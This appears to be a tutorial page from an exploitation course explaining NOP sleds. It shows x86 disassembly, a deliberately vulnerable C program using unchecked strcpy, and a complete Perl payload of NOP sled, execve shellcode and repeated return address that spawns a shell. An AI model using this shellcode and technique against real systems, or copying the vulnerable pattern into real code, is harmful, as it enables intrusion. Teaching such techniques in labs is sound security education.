NOP Sled

To transfer control flow directly to our shellcode, we need to specify its address as the return address of the current function. However, guessing the exact address can be very hard, especially on remote machines where no debugger is available. Even minor system differences can lead to a different stack layout.

Example: Remember that argv[0] contains the execution path of the program. Starting the binary from a different directory results in a different execution path and thus a different stack layout1).

Missing the correct address by even a single byte breaks the exploit. Consider the following x86 assembly code, which immediately terminates the application.

; nasm -f elf32 offset.s
global _start
mov eax, 1
mov ebx, 0
int 0x80

Disassembling the object file with objdump shows the correct result.

$ objdump -d -M intel-mnemonic correct_offset.o 

correct_offset.o:     file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
   0:   b8 01 00 00 00          mov    eax,0x1
   5:   bb 00 00 00 00          mov    ebx,0x0
   a:   cd 80                   int    0x80

Note that x86 instructions are encoded with variable lengths2): the two mov instructions take five bytes each, while int 0x80 takes only two.

To show the importance of correct instruction offsets, we delete only the very first byte (value 0xb8, the opcode of the first mov instruction) and disassemble the result again.

$ objdump -d -M intel-mnemonic incorrect_offset.o

incorrect_offset.o:     file format elf32-i386

Disassembly of section text:

00000000 <text>:
   0:   01 00                   add    DWORD PTR [eax],eax
   2:   00 00                   add    BYTE PTR [eax],al
   4:   bb 00 00 00 00          mov    ebx,0x0
   9:   cd 80                   int    0x80

Note that even for this tiny example with a single deleted byte the resulting code is significantly different from the original one.

What we want now is a memory area in front of our code to which we can safely redirect execution. The bytes in this area must therefore decode as valid instructions. As seen before, an offset of a single byte in the instruction address can destroy the meaning of the code. To avoid this, we need an instruction that is only a single byte long, so that every address in the area is the start of a valid instruction.

Our final requirement is that the instruction must not affect any registers (except for the instruction pointer, which naturally advances by one after execution). The x86 instruction set provides an instruction that fulfills all of these requirements: the NOP (No OPeration) instruction. Its opcode is 0x90, and it is usually implemented as an alias for the following instruction3):

xchg eax,eax

Next, we will take a look at a simple example and make use of this technique called NOP sled4).

// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 execve.c
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
    char buffer[128] = {0};
    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }
    // Print the buffer address to help choose a target address.
    printf("Buffer: %p\n", buffer);
    // No bounds check: arguments longer than the buffer overflow it.
    strcpy(buffer, argv[1]);
    return 0;
}

Inspecting the code above, you will notice that the only difference from our example in the buffer overflow introduction is the size of the buffer. Back then, it was of utmost importance to overwrite the return address correctly and to know exactly which address to jump to. By adding a sequence of NOPs directly before the shellcode, we can loosen the second constraint. This sequence of NOPs is commonly called a "NOP sled"5). Returning to any address within this sequence works just as well as landing exactly at the beginning of the shellcode. If the NOPs are hit, the processor spends some cycles doing nothing until it reaches the real shellcode.

In this example we have a buffer of size 128, while our shellcode takes up only 28 bytes. This leaves 100 bytes of space for the NOP sled. As this many characters are cumbersome to type and copy, we will generate the input with Perl. The NOP sled is followed by the actual shellcode and the approximate address we want to jump to. It is sufficient to land somewhere within the 100-byte range of the NOP sled; we do not need to know the exact address of the shellcode. Assuming correct alignment with respect to the stack variables, we can also repeat the target address several times to increase the chance of overwriting the return address.

Our payload now contains the following:

  • 100 bytes NOP sled
  • 28 bytes shellcode
  • 16 bytes of the approximate target address 0xffffd2ff (4 byte address value repeated 4 times)

A visual representation of the memory layout is included below.

Passing this payload to the application successfully spawns a shell.

$ ./a.out $(perl -e 'print
"\x90"x100 .
"\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" .
"\xff\xd2\xff\xff"x4')
Buffer: 0xffffd2e4
